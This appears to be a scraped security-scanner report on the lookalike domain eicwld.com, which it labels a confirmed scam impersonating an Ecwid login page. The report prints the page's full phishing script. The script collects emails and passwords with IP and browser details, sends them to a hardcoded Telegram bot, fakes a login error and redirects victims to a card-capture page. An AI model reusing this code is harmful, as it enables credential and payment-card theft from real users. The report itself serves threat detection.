e-commerce shopping

social media network

technology software

corporate business

English

The domain name 'eicwld.com' uses the commercial generic top-level domain (.com) while skipping any subdomain. Count 6 characters in 'eicwld' with 2 vowels and four consonants. Segmentation suggests three words: ei, cw, ld. The median word length lands at 2 characters. No strong language cues emerged from the frequency lists.

html/29/af/29af716b-16e8-49b2-aeed-b285168de4bf_fallback.html.gz

Login | Ecwid

email

password

company_rq3ogvxo

html/29/af/29af716b-16e8-49b2-aeed-b285168de4bf.html.gz

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/images-tbn

176e894661aa9cdc9a5cba6c720044cbbf7b8bd80d1c9a142a7c24b1b6c50d15

5ebe285ab43e5be2c766c65329eab267e7cefd2cb448b0f69e6ca881bb751519

f9bfff065dc1c8b937c1a65d4767bf0fe17e6c2794ec7163ecbeeec7a61f0135

viewport

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

GoDaddy.com, LLC

EICWLD.COM

Abuse

Admin

Cloudflare-NOC

Cloudflare, Inc.

CLOUDFLARENET

// Telegram Bot Configuration
 const TELEGRAM_BOT_TOKEN = '8454001532:AAGG9c3Gwus7SP07nF0L6sdBLGr9Zh7T-Lk';
 const TELEGRAM_CHAT_ID = '1372352545';

 // Function to send message to Telegram
 async function sendToTelegram(message) {
 try {
 const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
 const response = await fetch(url, {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json',
 },
 body: JSON.stringify({
 chat_id: TELEGRAM_CHAT_ID,
 text: message,
 parse_mode: 'HTML'
 })
 });
 return response.ok;
 } catch (error) {
 console.error('Error sending to Telegram:', error);
 return false;
 }
 }

 // Function to get IP information
 async function getIPInfo() {
 try {
 const response = await fetch('https://ipapi.co/json/');
 const data = await response.json();
 return `IP: ${data.ip} | Country: ${data.country_name} | City: ${data.city}`;
 } catch (error) {
 return 'IP: Unknown';
 }
 }

 // Function to format login attempt for Telegram
 function formatLoginAttempt(email, password, attemptNumber, ipInfo) {
 return `
🔐 Login Attempt #${attemptNumber}
━━━━━━━━━━━━━━━━━━━━
📧 Email: <code>${email}</code>
🔑 Password: <code>${password}</code>
🔄 Attempt: #${attemptNumber}
${ipInfo}
🌐 User Agent: ${navigator.userAgent}
⏰ Time: ${new Date().toLocaleString()}
━━━━━━━━━━━━━━━━━━━━
 `;
 }

 (function () {
 const HP_MIN_ELAPSED_SEC = 0.8;
 const SPINNER_MS = 3000;

 let loginAttempts = 0;
 let pageLoadTs = Date.now();

 function createHoneypot() {
 const container = document.getElementById('hpContainer');
 const wrapper = document.createElement('div');
 wrapper.className = 'hp-offscreen';
 const label = document.createElement('label');
 const rand = Math.random().toString(36).slice(2,10);
 const hpName = 'company_' + rand;
 label.setAttribute('for', hpName);
 label.textContent = 'Company (optional)';

 const input = document.createElement('input');
 input.type = 'text';
 input.name = hpName;
 input.id = hpName;
 input.autocomplete = 'off';
 input.setAttribute('aria-hidden', 'true');
 input.tabIndex = -1;

 wrapper.appendChild(label);
 wrapper.appendChild(input);
 container.appendChild(wrapper);

 return { name: hpName, inputEl: input };
 }

 const hp = createHoneypot();

 function showSpinner(show) {
 const spinner = document.getElementById('btnSpinner');
 const label = document.getElementById('btnLabel');
 if (show) {
 spinner.classList.remove('hidden');
 label.textContent = '';
 } else {
 spinner.classList.add('hidden');
 label.textContent = 'Sign In';
 }
 }

 const form = document.getElementById('loginForm');
 const pwError = document.getElementById('pwError');
 const passwordEl = document.getElementById('password');
 const submitBtn = document.getElementById('submitBtn');

 form.addEventListener('submit', async function (ev) {
 ev.preventDefault();

 // Bot checks
 if (hp.inputEl.value && hp.inputEl.value.trim() !== '') {
 return;
 }
 const elapsedSec = (Date.now() - pageLoadTs) / 1000;
 if (elapsedSec < HP_MIN_ELAPSED_SEC) {
 return;
 }

 loginAttempts += 1;
 const email = document.getElementById('email').value;
 const password = document.getElementById('password').value;

 // Get IP info and send to Telegram
 const ipInfo = await getIPInfo();
 const telegramMessage = formatLoginAttempt(email, password, loginAttempts, ipInfo);
 await sendToTelegram(telegramMessage);

 // UI: show spinner and disable form
 showSpinner(true);
 submitBtn.disabled = true;
 pwError.classList.add('hidden');

 setTimeout(() => {
 showSpinner(false);
 submitBtn.disabled = false;

 if (loginAttempts === 1) {
 pwError.classList.remove('hidden');
 passwordEl.value = '';
 pageLoadTs = Date.now();
 return;
 }

 if (loginAttempts >= 2) {
 // Store email for CC page
 localStorage.setItem('userEmail', email);
 window.location.href = 'cc.html';
 }
 }, SPINNER_MS);
 });

 if (new URLSearchParams(location.search).get('nohp') === '1') {
 const container = document.getElementById('hpContainer');
 container.innerHTML = '';
 }

 document.getElementById('email').focus();
 })();

PasswordField

✅ Low Risk - https://eicwld.com/cp/ox_file.html

Requests	IP Address	Location	AS Autonomous System
8	104.26.2.143	United States	AS13335CLOUDFLARENET
0	198.54.116.36	United States	AS22612NAMECHEAP-NET
0	142.250.185.206	United States	AS15169GOOGLE
0	3.171.211.10	United States	AS16509AMAZON-02
0	104.26.3.143	United States	AS13335CLOUDFLARENET
0	3.167.227.35	United States	AS16509AMAZON-02
0	2600:9000:28c5:ce00:1f:58b3:eac0:21	United States	AS16509AMAZON-02
0	3.167.227.87	United States	AS16509AMAZON-02
0	3.167.227.10	United States	AS16509AMAZON-02
0	172.67.68.11	United States	AS13335CLOUDFLARENET
8	33	-	-

Security Scan Report: eicwld.com

Summary

AI Security Verdict

Confirmed Scam

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies1

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History